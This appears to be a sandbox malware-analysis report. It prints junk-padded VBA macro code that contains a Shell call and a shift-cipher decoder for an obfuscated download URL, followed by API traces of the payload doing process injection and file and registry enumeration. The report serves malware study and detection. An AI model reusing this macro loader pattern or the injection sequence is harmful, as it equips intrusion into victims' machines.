434 | Qktd2 = (338 - 233) - 14
435 | Dim Gs8t8 as String
436 | Gs8t8 = N578T | N578T
437 | Open B78Bz For Binary As # 19 | Open
438 | Dim Uqt4K(18 To 483) as Long
439 | Uqt4K(18) = (- 535 + 962) + 35
440 | Dim HL8B8(40) as Byte
441 | HL8B8(40) = 163
442 | Dim FH3aW as String
443 | FH3aW = U3038 | U3038
444 | Dim Pz62B(59) as Byte
445 | Pz62B(59) = 168
446 | Dim S303u(92) as Byte
447 | S303u(92) = 61
448 | Dim NW5wB as Long
449 | NW5wB = (279 / 633) + 28
450 | Dim Pp7vm(79) as Byte
451 | Pp7vm(79) = 12
452 | Dim D20d3 as Byte
453 | D20d3 = 212
454 | Dim SE0jN as String
455 | SE0jN = "FPLi6"
456 | Dim T86QH(2 To 75) as String
457 | T86QH(2) = Y0SFj | Y0SFj
458 | Dim XSppB as Long
459 | XSppB = (667 / 48) + 4
460 | Put # 19, , RTkJ0
461 | Dim Mf17B(31 To 159) as Long
462 | Mf17B(31) = (349 - 920) + 18
463 | Dim AyHq1(27 To 332) as Long
464 | AyHq1(27) = (- 390 + 749) + 19
465 | Dim N6L1O as Long
466 | N6L1O = (- 764 + 116) + 7
467 | Dim JAYs7 as Byte
468 | JAYs7 = 216
469 | Dim P1h2Y(25 To 237) as String
470 | P1h2Y(25) = EqDjd | EqDjd
471 | Dim X1z36(43) as Byte
472 | X1z36(43) = 200
473 | Dim A4n88 as Long
474 | A4n88 = (- 354 / 296) + 42
475 | Dim UbRVW as Long
476 | UbRVW = (- 535 / 642) / 32
477 | Dim TU6xB as Long
478 | TU6xB = (- 708 - 917) + 16
479 | Dim K48Z4 as Byte
480 | Dim EdHSW(7 To 484) as String
481 | EdHSW(7) = "DX0mh"
482 | Dim TeAB3 as Long
483 | TeAB3 = (1 - 500) + 34
484 | Close # 19
485 | Dim J1Wo3 as String
486 | J1Wo3 = "U0xEV"
487 | Dim VF16a as String
488 | VF16a = "S6WCJ"
489 | Dim WcTgf as Long
490 | WcTgf = (768 / 466) - 7
491 | Dim JmG7I as String
492 | JmG7I = "R21L5"
493 | Dim J0t0N as Long
494 | J0t0N = (- 891 / 842) / 5
495 | Dim Mu8NH(86) as Byte
496 | Mu8NH(86) = 250
497 | Dim QA4Mr(7 To 148) as Long
498 | QA4Mr(7) = (503 + 327) + 6
499 | Dim C0PZL as Long
500 | C0PZL = (- 388 + 134) + 30
501 | Dim HrrCc(91) as Byte
502 | HrrCc(91) = 57
503 | Dim Hk0V0 as Long
504 | Hk0V0 = (713 + 996) / 2
505 | Dim Rb1h8 as Byte
506 | Rb1h8 = 112
507 | Dim U617W(12 To 96) as String
508 | U617W(12) = J6Xnm | J6Xnm
509 | Dim ZRCcY(30 To 393) as String
510 | ZRCcY(30) = Gn0p5 | Gn0p5
511 | Dim P6yT0(59) as Byte
512 | P6yT0(59) = 81
513 | Dim YQZp0(66) as Byte
514 | YQZp0(66) = 53
515 | Dim Sa4Q0(0) as Byte
516 | Sa4Q0(0) = 65
517 | Dim WYHVk(1 To 106) as String
518 | WYHVk(1) = "PGn02"
519 | Dim Igsio(10 To 56) as String
520 | Igsio(10) = "V20A1"
521 | End With
522 | Dim TY3vv as Long
523 | TY3vv = (- 297 + 744) + 33
524 | Dim RtUn3 as String
525 | RtUn3 = X6RIx | X6RIx
526 | Dim HT1LE(48) as Byte
527 | HT1LE(48) = 60
528 | Dim Kg17y(11) as Byte
529 | Kg17y(11) = 227
530 | Dim T6AE8 as Long
531 | T6AE8 = (- 907 - 367) - 32
532 | Dim D6KKC as Byte
533 | Dim TOe3b as String
534 | TOe3b = "CtDSH"
535 | Dim BIXuv as Byte
536 | BIXuv = 20
537 | Dim DHJ31(10) as Byte
538 | DHJ31(10) = 98
539 | Dim A7OP0 as String
540 | A7OP0 = TyTNz | TyTNz
541 | Dim D2WGt(28 To 97) as Long
542 | D2WGt(28) = (876 + 476) - 31
543 | Dim URDqO(11 To 381) as Long
544 | URDqO(11) = (103 - 251) - 31
545 | Dim ZQQNT as Long
546 | ZQQNT = (- 941 + 373) + 30
547 | Dim U60S8 as Long
548 | U60S8 = (- 290 + 803) + 20
549 | Dim IVOcx as Byte
550 | IVOcx = 200
551 | Dim RmOJE(9 To 201) as String
552 | RmOJE(9) = "Qgym7"
553 | Dim C1E75(10 To 44) as String
554 | C1E75(10) = "Gt7oe"
555 | Dim UQkcM(91) as Byte
556 | UQkcM(91) = 217
557 | Dim Q2z35 as Byte
558 | Q2z35 = 177
559 | End Sub

APIs | Meta Information
H0M0p
Kh1g3
W4t1q
K1jv6
W10rU
WK0I3
Shell
Yi5qQ
Td518
G4mfw

Strings | Decrypted Strings
"XGe3h"
"M8V15"
"LBfNF"
"B0v6X"
"M3wGt"
"Qpo3B"
"VL6YB"
Line | Instruction | Meta Information
560 | Public Sub sh1(F00qU)
561 | Dim Ptc5o(13 To 200) as String
562 | Ptc5o(13) = H0M0p | H0M0p
563 | Dim ZaG8G(8 To 99) as Long
564 | ZaG8G(8) = (162 + 318) - 21
565 | Dim I5ig6(14 To 381) as String
566 | I5ig6(14) = "XGe3h"
567 | Dim Bpabn as String
568 | Bpabn = "M8V15"
569 | Dim DAF72 as String
570 | DAF72 = "LBfNF"
571 | Dim TKO2N as Long
572 | TKO2N = (- 315 + 418) - 5
573 | Dim L587f as Long
574 | L587f = (- 185 - 760) - 7
575 | Dim AAec6(34 To 341) as String
576 | AAec6(34) = Kh1g3 | Kh1g3
577 | Dim Nm0Yv as Long
578 | Nm0Yv = (415 - 106) + 43
579 | Dim G6l8T(19 To 438) as String
580 | G6l8T(19) = "B0v6X"
581 | Dim LTFyB as Long
582 | LTFyB = (- 448 + 490) + 36
583 | Dim JQ6ao(16 To 331) as String
584 | JQ6ao(16) = W4t1q | W4t1q
585 | Dim T61ct(58) as Byte
586 | T61ct(58) = 198
587 | Dim ToH5N(9 To 217) as Long
588 | ToH5N(9) = (670 - 498) / 32
589 | Dim H65i1 as String
590 | H65i1 = "M3wGt"
591 | Dim Ulb3r(30 To 474) as Long
592 | Ulb3r(30) = (886 + 165) + 27
593 | Dim FTHZk(6 To 474) as String
594 | FTHZk(6) = K1jv6 | K1jv6
595 | Dim X1MrK as Byte
596 | Dim OOI2e as Long
597 | OOI2e = (958 + 425) - 45
598 | Dim I10aL(28 To 158) as Long
599 | I10aL(28) = (256 / 317) + 4
600 | Dim Md7Q6(26 To 100) as String
601 | Md7Q6(26) = "Qpo3B"
602 | Dim DtE35(25 To 292) as String
603 | DtE35(25) = W10rU | W10rU
604 | Dim BCl86(56) as Byte
605 | BCl86(56) = 171
606 | Dim S3G1Z as Byte
607 | S3G1Z = 88
608 | Dim Vp54V(31 To 165) as String
609 | Vp54V(31) = WK0I3 | WK0I3
610 | Dim XVX82 as String
611 | XVX82 = "VL6YB"
612 | Shell F00qU | Shell
613 | Dim TaG5l(36) as Byte
614 | TaG5l(36) = 225
615 | Dim BB7L8(5 To 168) as Long
616 | BB7L8(5) = (- 165 / 193) + 26
617 | Dim Lf1pz as Byte
618 | Lf1pz = 76
619 | Dim Z7x5a(28 To 292) as Long
620 | Z7x5a(28) = (- 248 / 732) + 46
621 | Dim XgI18 as Long
622 | XgI18 = (778 - 317) + 27
623 | Dim F4HU2(84) as Byte
624 | F4HU2(84) = 113
625 | Dim PgKgC(5) as Byte
626 | PgKgC(5) = 166
627 | Dim APvq3(20) as Byte
628 | APvq3(20) = 139
629 | Dim T8sNm(2 To 86) as Long
630 | T8sNm(2) = (- 843 + 294) + 10
631 | Dim H0KD2 as Long
632 | H0KD2 = (664 / 688) - 11
633 | Dim N2PIL as String
634 | N2PIL = Yi5qQ | Yi5qQ
635 | Dim Q37jQ as Byte
636 | Q37jQ = 252
637 | Dim Rrp7P as String
638 | Rrp7P = Td518 | Td518
639 | Dim Y27e5(28 To 130) as Long
640 | Y27e5(28) = (823 / 937) - 47
641 | Dim QsI7W(66) as Byte
642 | QsI7W(66) = 100
643 | Dim Zy4bG(43) as Byte
644 | Zy4bG(43) = 218
645 | Dim Tg68A as Byte
646 | Tg68A = 121
647 | Dim I4ysJ as String
648 | I4ysJ = G4mfw | G4mfw
649 | Dim EKeB4(11 To 332) as Long
650 | EKeB4(11) = (44 - 194) + 49
651 | End Sub

Module: U2YLn

Declaration
Line | Content
1 | Attribute VB_Name = "U2YLn"

Executed Functions
APIs | Meta Information
OCkrm
AST0b
ZYu1R
HsaCb
Len | Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38
BbA1x
Chr
Asc
Mid
OjKf2

Strings | Decrypted Strings
"GYv57"
"V7I6P"

Line | Instruction | Meta Information
2 | Function BjOEsxO3(optional Wez36, optional randcif)
3 | Dim YVBUd as Byte | executed
4 | Dim K1txh(70) as Byte
5 | K1txh(70) = 153
6 | Dim K1oFf as String
7 | K1oFf = "GYv57"
8 | Dim P0K85 as Long
9 | P0K85 = (236 - 686) / 2
10 | Dim QDKu7(40) as Byte
11 | QDKu7(40) = 95
12 | Dim QHCci(15 To 388) as Long
13 | QHCci(15) = (993 / 320) / 33
14 | Dim XJLMD(97) as Byte
15 | XJLMD(97) = 14
16 | Dim LzTI8(33) as Byte
17 | LzTI8(33) = 56
18 | Dim W376U(2 To 177) as String
19 | W376U(2) = OCkrm | OCkrm
20 | Dim CkF05 as Long
21 | CkF05 = (- 294 + 834) / 2
22 | Dim I365r(34) as Byte
23 | I365r(34) = 119
24 | Dim OFNUb(94) as Byte
25 | OFNUb(94) = 106
26 | Dim FyNWs(15 To 422) as String
27 | FyNWs(15) = AST0b | AST0b
28 | Dim Ad61u as String
29 | Ad61u = "V7I6P"
30 | Dim M8yYX(6 To 242) as Long
31 | M8yYX(6) = (- 686 - 221) / 49
32 | Dim VSA4C as Byte
33 | Dim NQ7c1 as Long
34 | NQ7c1 = (- 813 / 193) + 36
35 | Dim UTudO(95) as Byte
36 | UTudO(95) = 224
37 | Dim YW2oS(33 To 216) as Long
38 | YW2oS(33) = (388 / 946) - 46
39 | Dim Y7a3h(22 To 308) as Long
40 | Y7a3h(22) = (- 268 + 837) - 9
41 | Dim B8atH as String
42 | B8atH = ZYu1R | ZYu1R

                    43

                    Dim CKC1u(23 To 217) as Long

                    44

                    CKC1u(23) = (215 + 644) - 47

                    45

                    Dim VNkBN as String

                    46

                    VNkBN = HsaCb

                    HsaCb

                    47

                    For i = 1 To Len(Wez36)

                    Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38

                    executed
                    48

                    Dim ToR08 as String

                    49

                    ToR08 = BbA1x

                    BbA1x

                    50

                    K1AJP = K1AJP + Chr(Asc(Mid(Wez36, i, 1)) - 3)

                    Chr

                    Asc

                    Mid

                    51

                    Dim RB48x(59) as Byte

                    52

                    RB48x(59) = 202

                    53

                    Dim RuFGf as Long

                    54

                    RuFGf = (163 - 66) + 10

                    55

                    Next

                    Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38

                    executed
                    56

                    Dim Qu53J as Byte

                    57

                    Qu53J = 0

                    58

                    Dim AX212 as String

                    59

                    AX212 = OjKf2

                    OjKf2

                    60

                    BjOEsxO3 = K1AJP

                    61

                    Dim QFj46(93) as Byte

                    62

                    QFj46(93) = 12

                    63

                    Dim Y8FMQ as Byte

                    64

                    Y8FMQ = 8

                    65

                    End Function


                      Execution Graph

                      Execution Coverage:40.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:13.9%
                      Total number of Nodes:599
                      Total number of Limit Nodes:96

                      Graph


                      Executed Functions

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      APIs
                      • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01413F6D
                      • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01413F81
                      • CloseHandle.KERNEL32(?), ref: 01413F98
                      • StrRChrA.SHLWAPI(014111A9,00000000,0000005C), ref: 01413FA4
                      • lstrcat.KERNEL32(014111A9,0141825D), ref: 01413FDE
                      • FindFirstFileA.KERNELBASE(014111A9,?), ref: 01413FF4
                      • FindNextFileA.KERNELBASE(?,?), ref: 01414026
                      • StrChrA.SHLWAPI(?,0000002E), ref: 01414094
                      • memcpy.NTDLL(0141618C,?,00000000), ref: 014140CD
                      • FindNextFileA.KERNELBASE(?,?), ref: 014140E2
                      • CompareFileTime.KERNEL32(?,?), ref: 0141410B
                      • HeapFree.KERNEL32(00000000,0141618C,01418049), ref: 01414141
                      • HeapFree.KERNEL32(00000000,014111A9), ref: 01414151
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: File$Find$FreeHeapNextTime$CloseCompareCreateFirstHandlelstrcatmemcpy
                      • String ID: pnls$}nls
                      • API String ID: 2101777934-4252118926
                      • Opcode ID: 558aafc92e2d9df2e98636c60d96cf5ff44cb43fc9fcd5acebe338e712f99de4
                      • Instruction ID: 78432c1be7b8b0ec9c02010508ac2cdb9724b9feb85ab91e9e00d511934bc10f
                      • Opcode Fuzzy Hash: 558aafc92e2d9df2e98636c60d96cf5ff44cb43fc9fcd5acebe338e712f99de4
                      • Instruction Fuzzy Hash: 63816AB1D00219AFDB21DFA9DC88AEEBFB9FB48300F15456AE515E2264D7709A44CF60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      APIs
                        • Part of subcall function 0141271B: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01412776
                        • Part of subcall function 0141271B: memset.NTDLL ref: 0141279B
                        • Part of subcall function 0141271B: RtlNtStatusToDosError.NTDLL(00000000), ref: 014127B7
                        • Part of subcall function 0141271B: NtClose.NTDLL(?), ref: 014127CB
                      • memcpy.NTDLL(?,CCCCFEEB,?,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411D5F
                      • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01412386,?,01412386,01412386,?,?,?,?,00000000), ref: 01411DB0
                        • Part of subcall function 01411ADD: GetModuleHandleA.KERNEL32(014180DB,?,CCCCFEEB,01411E0D,?,?,?,00000000), ref: 01411B10
                        • Part of subcall function 01411ADD: memcpy.NTDLL(?,014175E0,00000018,0141845C,01418400,01418451), ref: 01411B7B
                      • memcpy.NTDLL(?,01412486,00000800,?,?,?,00000000), ref: 01411E20
                        • Part of subcall function 014138AE: memset.NTDLL ref: 014138CD
                        • Part of subcall function 01411B8A: memcpy.NTDLL(CCCCFEEB,014175F8,00000018,CCCCFEEB,0141845C,CCCCFEEB,01418400,CCCCFEEB,01418451,CCCCFEEB,01411E05,?,01412386,?,?,00000000), ref: 01411C1B
                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01411E4B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01411E52
                      • CloseHandle.KERNEL32(00000000), ref: 01411E61
                      • memset.NTDLL ref: 01411E75
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 014126DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                        • Part of subcall function 014126DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                        • Part of subcall function 014127DA: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01412848
                        • Part of subcall function 014127DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 01412865
                        • Part of subcall function 014127DA: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 014128A7
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: memcpy$ErrorSectionStatusmemset$CloseHandleHeapView$AllocateCreateFreeModuleUnmap
                      • String ID: pnls
                      • API String ID: 17049359-141991303
                      • Opcode ID: 59565d1570c0fc81f6e808788970296c2f4aebdb9d01563b104f1ebace45eed8
                      • Instruction ID: 3fe63678d78ee43073aabcfdc20b74d303d6598a2e010bf86e35bcc1ef97ecd8
                      • Opcode Fuzzy Hash: 59565d1570c0fc81f6e808788970296c2f4aebdb9d01563b104f1ebace45eed8
                      • Instruction Fuzzy Hash: 4D8169B0D0060AEFDF21DFA8C884AAEBBB5FF04704F14456AE605A7365E770EA45CB50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtOpenProcess.NTDLL(0141618C,00000400,?,01417614), ref: 01412AC3
                      • NtOpenProcessToken.NTDLL(0141618C,00000008,0000000C), ref: 01412AD6
                      • NtQueryInformationToken.NTDLL(0000000C,00000001,00000000,00000000,0141618C), ref: 01412AF1
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • NtQueryInformationToken.NTDLL(0000000C,00000001,00000000,0141618C,0141618C,0141618C), ref: 01412B0E
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                      • NtClose.NTDLL(0000000C), ref: 01412B2D
                      • NtClose.NTDLL(0141618C), ref: 01412B36
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Token$CloseHeapInformationOpenProcessQuery$AllocateFree
                      • String ID:
                      • API String ID: 770469984-0
                      • Opcode ID: 532c0c0b89ba4fbd119b863e44f78a87e123ee7113ccf57ecaacd08ccb1e0d1f
                      • Instruction ID: 67701bdd7679ac1069881abd663ca0e8c60b8003a0896b5e8c622db73d412163
                      • Opcode Fuzzy Hash: 532c0c0b89ba4fbd119b863e44f78a87e123ee7113ccf57ecaacd08ccb1e0d1f
                      • Instruction Fuzzy Hash: 08212872A00219BBDB119FA5CC44EDEBFBDFF18740F104066FA04E6224D7B19A459BA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 014137AB
                      • GetLastError.KERNEL32(?,00000318,00000008), ref: 0141389E
                        • Part of subcall function 01413D34: NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                        • Part of subcall function 01413D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                        • Part of subcall function 01413D34: SetLastError.KERNEL32(00000000), ref: 01413D73
                        • Part of subcall function 01413C91: RtlNtStatusToDosError.NTDLL(00000000), ref: 01413CA9
                      • memcpy.NTDLL(00000218,01414E62,00000100,?,00010003,?,?,00000318,00000008), ref: 01413826
                        • Part of subcall function 01413CF3: NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                        • Part of subcall function 01413CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                        • Part of subcall function 01413CF3: SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 0141387D
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01413880
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$Status$Last$MemoryVirtual$AllocateContextThreadWritememcpymemset
                      • String ID:
                      • API String ID: 2207238129-0
                      • Opcode ID: 5f8fa202f48bd84e7cf034c4e9114294dff4325234a1e61f2c5ab90c3ac1a797
                      • Instruction ID: a0f8a367c8e24ceadb33ec732282025a75c97f94ffe6506d33be5bf2af5ac1f4
                      • Opcode Fuzzy Hash: 5f8fa202f48bd84e7cf034c4e9114294dff4325234a1e61f2c5ab90c3ac1a797
                      • Instruction Fuzzy Hash: C831637190030AAFDB21DF65C885A9ABBF8FF14324F14456EE94AE7264D730EA458B50
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01412776
                      • memset.NTDLL ref: 0141279B
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 014127B7
                      • NtClose.NTDLL(?), ref: 014127CB
                        • Part of subcall function 014126DC: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                        • Part of subcall function 014126DC: RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorSectionStatus$CloseCreateViewmemset
                      • String ID:
                      • API String ID: 783833395-0
                      • Opcode ID: 7bd71f428264f17f6e17c226e9eadbe784206940375a885c993c7ab6ad5b4067
                      • Instruction ID: 2a8c681b4074889cf648bad49ae082f5cef436b44011e05c1ac9b7162293093e
                      • Opcode Fuzzy Hash: 7bd71f428264f17f6e17c226e9eadbe784206940375a885c993c7ab6ad5b4067
                      • Instruction Fuzzy Hash: 17213E7190021DAFDB11DF98C8849EFBBB9FF08710F200516F911E7258D7B196548BA5
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtAllocateVirtualMemory.NTDLL(014137D3,00000000,00000000,014137D3,00003000,00000040), ref: 01413D65
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01413D6C
                      • SetLastError.KERNEL32(00000000), ref: 01413D73
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$AllocateLastMemoryStatusVirtual
                      • String ID:
                      • API String ID: 722216270-0
                      • Opcode ID: 6613021b3aee33a65cdafc998740588a1d051fe661c8063a1a67b54a6f35858a
                      • Instruction ID: 53ef94adc51a77e1d3e8412ab15288f13f8f8f4d7faf1799e403ac07c68b6560
                      • Opcode Fuzzy Hash: 6613021b3aee33a65cdafc998740588a1d051fe661c8063a1a67b54a6f35858a
                      • Instruction Fuzzy Hash: 1FF0FEB1910309FBEB15CB95D909FAE7BBCAB14359F504048B600A6194DBB4EB04DB64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtWriteVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,014160F0,?,014119D6,?,00000004,0141244E,00000004,?), ref: 01413D11
                      • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413D20
                      • SetLastError.KERNEL32(00000000,?,014119D6,?,00000004,0141244E,00000004,?,?,?,?,014122FD,00000000,0141244E,CCCCFEEB,00000000), ref: 01413D27
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$LastMemoryStatusVirtualWrite
                      • String ID:
                      • API String ID: 1089604434-0
                      • Opcode ID: c302869a32487cc0d9746d216dd6763f892ba157f055dd7bc8bc5e18cc5fa474
                      • Instruction ID: 734fbbc469a573b292f41ad0a94c4381bab0825f9480b958f8146dfacd7019f6
                      • Opcode Fuzzy Hash: c302869a32487cc0d9746d216dd6763f892ba157f055dd7bc8bc5e18cc5fa474
                      • Instruction Fuzzy Hash: 25E04F3620021AABDF115EE8EC04D9B7F6DBB18761F414011BF15C2135C731C862DBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtReadVirtualMemory.NTDLL(?,00000004,0141244E,0141244E,00000000,00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C), ref: 01413CD0
                      • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01413CDF
                      • SetLastError.KERNEL32(00000000,?,014122DE,00000000,0141244E,0141244E,00000004,?,00000000,00000000,0141605C,00000000), ref: 01413CE6
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: Error$LastMemoryReadStatusVirtual
                      • String ID:
                      • API String ID: 4030520765-0
                      • Opcode ID: d250017a3dc8a667b3b4df2d9cc7db363a5101cd5da3e98c74f3233e0130f078
                      • Instruction ID: f1374ba557926816b179dadfc5ef06bd585cf60e85b1413e1ce2092fe14170de
                      • Opcode Fuzzy Hash: d250017a3dc8a667b3b4df2d9cc7db363a5101cd5da3e98c74f3233e0130f078
                      • Instruction Fuzzy Hash: A9E0BF3760021AABDF115EEADD04D9B7F6DBB18761B014025BF05D2135D772D861EBE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                        • Part of subcall function 01411174: HeapFree.KERNEL32(00000000,?,01413C0E), ref: 01411180
                        • Part of subcall function 0141115F: RtlAllocateHeap.NTDLL(00000000,?,01413BA9), ref: 0141116B
                      • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 01413C4C
                      • RtlNtStatusToDosError.NTDLL(C000009A), ref: 01413C85
                        • Part of subcall function 014114BA: RtlUpcaseUnicodeString.NTDLL(?,0141764C,00000001), ref: 014114E6
                        • Part of subcall function 014114BA: RtlFreeAnsiString.NTDLL(?), ref: 01411564
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: FreeHeapString$AllocateAnsiErrorInformationQueryStatusSystemUnicodeUpcase
                      • String ID:
                      • API String ID: 1666562127-0
                      • Opcode ID: f9c7b6c615f56a78488bd1080aa9f9135bf1a01121642c3834811418eb479066
                      • Instruction ID: ff5d5adcce7ed74c3f1178bd2a8c4022db2477b40ef5c508a466b6c6c5f92ccc
                      • Opcode Fuzzy Hash: f9c7b6c615f56a78488bd1080aa9f9135bf1a01121642c3834811418eb479066
                      • Instruction Fuzzy Hash: 3701DB77902521AAEB315F6B8904AAFE969AF56E64F06011AEF0563338F770890186D0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01412709
                      • RtlNtStatusToDosError.NTDLL(00000000), ref: 01412710
                      Memory Dump Source
                      • Source File: 00000003.00000002.1149407200.01411000.00000020.sdmp, Offset: 01411000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_1411000_text.jbxd
                      Similarity
                      • API ID: ErrorSectionStatusView
                      • String ID:
                      • API String ID: 1313840181-0
                      • Opcode ID: 350883369f9230d411cfd086ddd0c7395b90a8620823851d8fc76dc8a3c476f1
                      • Instruction ID: c914e7775150ae55e597907330cb421947e53d351667242d032fb93aa7b3e959
                      • Opcode Fuzzy Hash: 350883369f9230d411cfd086ddd0c7395b90a8620823851d8fc76dc8a3c476f1
                      • Instruction Fuzzy Hash: 25E0EDB6900208FFEF059F94DC0FDEF7B7DEB44300F00856ABA15A6155E6B0AA18DB60
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Control-flow Graph

                      APIs
                      • StrChrA.SHLWAPI(01414321,0000005F), ref: 01412F03
                      • lstrcpy.KERNEL32(?,01414321), ref: 01412F1B
                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 01412F51
                      • RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412F77
                      • lstrlenW.KERNEL32 ref: 01412F88
                      • RtlAllocateHeap.NTDLL(00000000,01414357), ref: 01412F9D
                      • RegQueryValueExW.KERNEL32(?,014181C0,00000000,?,00000000,01414321), ref: 01412FC2
                      • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FE8
                      • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01412FFA
                      • lstrcmpiW.KERNEL32(00000000), ref: 01413011
                      • HeapFree.KERNEL32(00000000,01414321,?), ref: 01413196
                        • Part of subcall function 014141F8: lstrlenW.KERNEL32(00000000,?,?,01413030,00000000,?), ref: 0141420B
                        • Part of subcall function 014141F8: lstrlen.KERNEL32(01413030,?,01413030,00000000,?), ref: 01414216
                        • Part of subcall function 014141F8: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0141422B
                        • Part of subcall function 014141F8: wsprintfW.USER32 ref: 01414243
                        • Part of subcall function 014144D4: lstrlenW.KERNEL32(01413038,?,00000000,?,?,01413038,00000000), ref: 014144DD
                        • Part of subcall function 014144D4: memcpy.NTDLL(00000000,01413038,00000000,00000000,?,?,?,01413038,00000000), ref: 01414507
                        • Part of subcall function 014144D4: memset.NTDLL ref: 0141451B
                      • lstrcpy.KERNEL32(?,014180FA), ref: 01413053
